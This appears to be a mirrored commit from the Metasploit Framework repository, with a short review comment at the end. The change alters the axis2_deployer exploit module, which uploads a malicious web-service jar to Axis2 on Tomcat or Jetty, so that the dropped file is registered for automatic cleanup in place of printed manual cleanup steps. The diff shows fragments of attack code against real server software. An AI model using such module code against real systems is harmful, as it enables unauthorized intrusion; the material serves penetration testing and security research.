mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Land #6457, FileDropper for axis2_deployer

William Vu 2016-01-14 15:10:05 -06:00
commit fec75c1daa
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743


@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
@ -74,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_exec(session,rpath)
contents=''
name = Rex::Text.rand_text_alpha(8)
# We must register this file early, that way the on_new_session method
# won't miss it if FileDropper's cleanup routine kicks in.
register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
@ -215,7 +221,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res and res.code > 200 and res.code < 300
cleanup_instructions(rpath, name) # display cleanup info
throw :stop # exit loop
elsif res and res.code == 401
if (res.headers['WWW-Authenticate'])
@ -225,7 +230,6 @@ class Metasploit3 < Msf::Exploit::Remote
if authmsg
print_error("WWW-Authenticate: %s" % authmsg)
end
cleanup_instructions(rpath, name) # display cleanup info
raise ::Rex::ConnectionError
throw :stop # exit loop
end
@ -236,19 +240,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
def cleanup_instructions(rpath, name)
print_line("")
print_status("NOTE: You will need to delete the web service that was uploaded.")
print_line("")
print_status("Using meterpreter:")
print_status("rm \"webapps#{rpath}/WEB-INF/services/#{name}.jar\"")
print_line("")
print_status("Using the shell:")
print_status("cd \"webapps#{rpath}/WEB-INF/services\"")
print_status("del #{name}.jar")
print_line("")
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
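Review bot: The path given to `register_file_for_cleanup` in `upload_exec` is relative (`webapps#{rpath}/WEB-INF/services/#{name}.jar`), so automatic removal presumably succeeds only when the session's working directory is the servlet container's base directory. The removed `cleanup_instructions` made the same assumption, but it at least printed the exact file name. Whether the mixin reports a failed delete is not visible in this diff; if it does not, the uploaded service stays deployed on the tested host with no record of which jar to remove. I would document the assumption above the call, e.g. `# Path is relative to the container's base directory; cleanup depends on the session starting there.`, and keep a single `print_status("Uploaded service archive: webapps#{rpath}/WEB-INF/services/#{name}.jar")` so the artifact can still be located by hand. `upload_exec` continues outside the visible hunk.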